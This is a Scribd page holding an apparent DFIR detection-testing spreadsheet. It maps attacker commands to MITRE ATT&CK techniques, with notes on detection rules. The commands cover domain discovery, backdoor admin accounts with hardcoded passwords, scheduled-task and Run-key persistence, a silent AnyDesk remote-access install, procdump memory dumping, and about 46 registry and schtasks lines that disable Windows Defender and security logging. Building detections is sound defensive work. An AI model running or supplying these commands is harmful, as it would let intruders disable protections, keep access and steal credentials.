Scribd Logo
Upload

Welcome to Scribd!

  • DFIR Detection

    Uploaded by

    Viren Choudhari
    12 views9 pages
    The document contains a list of 46 commands that are used to disable security tools and features on Windows systems. This includes disabling Windows Defender's real-time protection, scheduled scans, and services. It also adds registry keys to stop the SecurityHealthService and other monitoring tools from starting. The overall effect is to significantly impair the system's defenses by stopping various antivirus, antimalware, and security health checking processes.

    Original Description:

    Copyright

    © © All Rights Reserved

    Available Formats

    XLSX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document contains a list of 46 commands that are used to disable security tools and features on Windows systems. This includes disabling Windows Defender's real-time protection, scheduled scans, and services. It also adds registry keys to stop the SecurityHealthService and other monitoring tools from starting. The overall effect is to significantly impair the system's defenses by stopping various antivirus, antimalware, and security health checking processes.

    Copyright:

    © All Rights Reserved
    Download as XLSX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    12 views9 pages

    DFIR Detection

    Uploaded by

    Viren Choudhari
    The document contains a list of 46 commands that are used to disable security tools and features on Windows systems. This includes disabling Windows Defender's real-time protection, scheduled scans, and services. It also adds registry keys to stop the SecurityHealthService and other monitoring tools from starting. The overall effect is to significantly impair the system's defenses by stopping various antivirus, antimalware, and security health checking processes.

    Copyright:

    © All Rights Reserved
    Download as XLSX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 9

    Sr. no.

    Commands
    1 C:\Windows\system32\cmd.exe /C net time

    2 C:\Windows\system32\cmd.exe /C ping qa.corp.qualys.com

    3 C:\Windows\system32\cmd.exe /C nltest /dclist:qa.corp.qualys.com

    4 C:\Windows\system32\cmd.exe /C Net group "Domain Admins" /domain \

    5 C:\Windows\system32\cmd.exe /C nslookup qualys.com

    6 C:\Windows\system32\cmd.exe /C ping 190.114.254.116

    7 C:\Windows\system32\cmd.exe /C net group /domain


    Detection Notes
    T1124- System Time Discovery

    T1016.001
    System Network Configuration Discovery:
    Internet Connection Discovery
    T1018
    Remote System Discovery
    T1018
    Remote System Discovery

    T1069.002
    Permission Groups Discovery: Domain
    Groups
    T1087.002
    Account Discovery: Domain Account
    T1018
    Remote System Discovery

    T1016.001
    System Network Configuration Discovery:
    Internet Connection Discovery
    T1018
    Remote System Discovery

    T1069.002
    Permission Groups Discovery: Domain
    Groups
    T1087.002
    Account Discovery: Domain Account
    Sr. no. Commands

    1 schtasks /create /tn HpSupport22 /tr C:\users\public\music\star.bat /SC ONSTART /F

    2 net user oldadiministrator "qc69t4B#Z0kE3" /add

    3 net localgroup Administrators old /ADD

    4 net user sqlbackup qc69t4b#z0ke3 /add

    5 net user localdomain qc69t4b#z0ke3 /add

    6 net localgroup administrators localadmin /add


    7 reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run /d "$dst$ /
    9 powershell -c "$Source = 'https://anydesk.com/en/downloads/thank-you?dv=win_exe'; $Destination='C:\Pr
    10 C:\ProgramData\AnyDesk.exe --install
    11 C:\ProgramData\AnyDesk --start-with-win --silent
    12 echo J9kzQ2Y0qO | C:\ProgramData\AnyDesk.exe --set-password
    13 C:\ProgramData\AnyDesk.exe --get-id

    15 wmic /node:"" process call create "cmd /c C:\perflogs\procdump.exe -accepteula -ma


    Detection Notes
    T1053.005
    Scheduled Task/Job:
    Scheduled Task

    T1078.003
    Valid Accounts: Local
    Accounts
    T1136.001
    Create Account: Local
    Account

    T1098 - Account
    Manipulation and
    T1078.003 - Valid
    Accounts: Local
    Accounts

    T1078.003 - Valid
    Accounts: Local
    Accounts T1136.001-
    Create Account: Local
    Account

    T1078.003 - Valid
    Accounts: Local
    Accounts T1136.001-
    Create Account: Local
    Account

    T1098 - Account
    Manipulation and
    T1078.003 - Valid
    Accounts: Local
    Accounts
    T1547.001-Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder and T1112 - Modify Registry
    ?dv=win_exe'; $Destination='C:\Pr Yara gave a score of 9
    Binary didn't run
    Binary didn't run
    Binary didn't run
    Binary didn't run

    T1047
    Windows
    Management
    Instrumentation Prodump has been taggetd by yara with 9 score, Prodump rule has been created
    Sr. no. Commands Detection

    T1562.001
    Impair Defenses: Disable or
    Modify Tools
    Q0025
    rem reg add "HKLM\System\CurrentControlSet\Services\ Disable or Stop Services, or
    4 SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f Terminate Processes
    5 rem 1 - Disable Real-time protection
    reg delete "HKLM\Software\Policies\Microsoft\Windows T1070
    6 Defender" /f Indicator Removal on Host
    T1562.001
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v Impair Defenses: Disable or
    7 "DisableAntiSpyware" /t REG_DWORD /d "1" /f Modify Tools
    T1562.001
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v Impair Defenses: Disable or
    8 "DisableAntiVirus" /t REG_DWORD /d "1" /f Modify Tools

    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\


    9 MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
    Real-Time Protection" /v "DisableBehaviorMonitoring" /t
    10 REG_DWORD /d "1" /f
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
    Real-Time Protection" /v "DisableIOAVProtection" /t
    11 REG_DWORD /d "1" /f
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
    Real-Time Protection" /v "DisableOnAccessProtection" /t
    12 REG_DWORD /d "1" /f
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
    Real-Time Protection" /v "DisableRealtimeMonitoring" /t
    13 REG_DWORD /d "1" /f
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
    Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t
    14 REG_DWORD /d "1" /f
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\
    Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d
    15 "1" /f

    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\


    16 SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\


    17 SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\


    18 SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
    reg add "HKLM\System\CurrentControlSet\Control\WMI\
    20 Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    reg add "HKLM\System\CurrentControlSet\Control\WMI\
    Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d
    21 "0" /f

    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\


    23 ExploitGuard MDM policy Refresh" /Disable
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\
    24 Windows Defender Cache Maintenance" /Disable
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\
    25 Windows Defender Cleanup" /Disable
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\
    26 Windows Defender Scheduled Scan" /Disable
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\
    27 Windows Defender Verification" /Disable

    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\


    29 Explorer\StartupApproved\Run" /v "Windows Defender" /f

    reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\


    30 Run" /v "Windows Defender" /f

    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\


    31 Run" /v "WindowsDefender" /f
    32 rem Remove WD context menu
    33 reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

    34 reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f


    35 reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    36 rem Disable WD services
    rem For these to execute successfully, you may need to boot into
    37 safe mode due to tamper protect
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v
    38 "Start" /t REG_DWORD /d "4" /f
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v
    39 "Start" /t REG_DWORD /d "4" /f
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v
    40 "Start" /t REG_DWORD /d "4" /f
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v
    41 "Start" /t REG_DWORD /d "4" /f
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v
    42 "Start" /t REG_DWORD /d "4" /f

    reg add "HKLM\System\CurrentControlSet\Services\


    43 SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    44 rem added the following on 07/25/19 for win10v1903
    reg add "HKLM\System\CurrentControlSet\Services\Sense" /v
    45 "Start" /t REG_DWORD /d "4" /f

    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\


    46 Run" /v "SecurityHealth" /f
    Notes

    T1562.001 score didn’t come

    Added a rule

    Added a rule

    Added a rule

    Added a rule

    Added a rule

    Added a rule

    Added a rule

    Added a rule

    Added a rule

    Added a rule
    Added a rule

    Added a rule

    You might also like